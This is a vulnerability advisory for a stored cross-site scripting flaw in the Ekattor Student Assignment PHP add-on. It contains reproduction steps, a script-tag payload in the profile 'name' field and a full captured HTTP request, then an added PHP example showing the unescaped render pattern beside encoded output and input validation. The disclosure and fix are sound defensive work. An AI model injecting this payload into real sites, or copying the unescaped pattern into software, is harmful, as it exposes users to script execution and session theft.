# Exploit Title: Ekattor Student Assignment PHP Script - Stored XSS
# Date: 2021-06-04
# Exploit Author: Mostafa Farzaneh - Smiling.Hunter@protonmail.com
# Vendor Homepage: https://codecanyon.net/user/creativeitem
# Software Link: https://codecanyon.net/item/ekattor-student-assignment-addon/30416274
# Tested on: Ubuntu
# How To Reproduce It:
1- Go to /demo/v7/login
2- Log in to your account (teacher, student, parent, ...)
3- Navigate to My account => Update profile
4- Edit the "Name" field to "<script>alert('xss')</script>"
5- The malicious code is now stored and executes wherever the user name is rendered on the site
POST /demo/v7addon/teacher/profile/update_profile HTTP/1.1
Host: localhost
Content-Length: 651
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysm60AiiVmAB6CmzY
Origin: localhost
Referer: http://localhost/demo/v7addon/teacher/profile
Accept-Encoding: gzip, deflate
Accept-Language: fa-IR,fa;q=0.9,en-US;q=0.8,en-XA;q=0.7,en;q=0.6
Cookie: ci_session=290c7b11d9e9f03c8e7a18b0d471b36741ec98b5
Connection: close

------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="name"

Alison <script>alert('xss')</script>
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="email"

teacher@example.com
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="phone"

345020212
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="address"

82 Kuen Suk Shuen Tsuen Hang Hiu Kowloon
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="profile_image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarysm60AiiVmAB6CmzY--
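The root cause of the issue above is that the "name" field from update_profile is stored as submitted and later echoed into HTML without encoding. The following PHP is an added example, not code from the advisory or from the Ekattor add-on: it reproduces the unsafe render pattern beside the hardened one (contextual HTML encoding at the output sink) and adds an input-side check as defence in depth. The function names, the markup and the validation rule are assumptions chosen for illustration; only the submitted name value comes from the captured request.

```php
<?php
// Added example (not part of the original advisory or the Ekattor code base).
// Shows the stored-XSS sink described above and its fix: the profile "name"
// is persisted as-is and later placed into HTML. The remediation is
// contextual output encoding at every place the name is rendered.
// Function names, markup and the validation rule are assumptions.

declare(strict_types=1);

// The value captured in the advisory's multipart POST (field "name").
const SUBMITTED_NAME = "Alison <script>alert('xss')</script>";

// Vulnerable pattern: the stored name is interpolated into markup unescaped,
// so the <script> element becomes part of the page for every viewer.
function render_name_vulnerable(string $storedName): string
{
    return "<h3 class=\"profile-name\">{$storedName}</h3>";
}

// Hardened pattern: HTML-encode the value for the element-content context.
// ENT_QUOTES also encodes ' and " so the same helper is safe inside
// attribute values; the explicit charset avoids encoding mismatches.
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_name_safe(string $storedName): string
{
    return '<h3 class="profile-name">' . esc_html($storedName) . '</h3>';
}

// Defence in depth for the update_profile handler: reject display names
// that contain markup characters before they are stored, instead of relying
// on every view to encode correctly. Output encoding stays the primary control.
function is_plausible_display_name(string $name): bool
{
    // Letters (any script), combining marks, digits, spaces, apostrophes,
    // hyphens and dots; 1 to 100 characters. Assumed policy for this example.
    return (bool) preg_match('/^[\p{L}\p{M}\p{N} \'.\-]{1,100}$/u', $name);
}

// Quick regression check: the safe renderer must never emit a raw <script> tag.
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

if (PHP_SAPI === 'cli') {
    echo "Vulnerable: ", render_name_vulnerable(SUBMITTED_NAME), PHP_EOL;
    echo "Hardened:   ", render_name_safe(SUBMITTED_NAME), PHP_EOL;
    echo "Raw <script> in hardened output? ",
        contains_raw_script(render_name_safe(SUBMITTED_NAME)) ? 'yes' : 'no', PHP_EOL;
    echo "Accepted by input validation? ",
        is_plausible_display_name(SUBMITTED_NAME) ? 'yes' : 'no', PHP_EOL;
}
```

Run with `php example.php`. In a CodeIgniter 3 application such as this one (the ci_session cookie indicates the framework), the built-in `html_escape()` helper wraps htmlspecialchars in the same way and should be applied to the name in every view that prints it; the encoding has to happen at the output sink, because the same stored value is rendered in several places and a fix applied only to the profile page leaves the other sinks exploitable.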
*********************************************************
# Discovered by: Mostafa Farzaneh
# Telegram: @pyweb_security
*********************************************************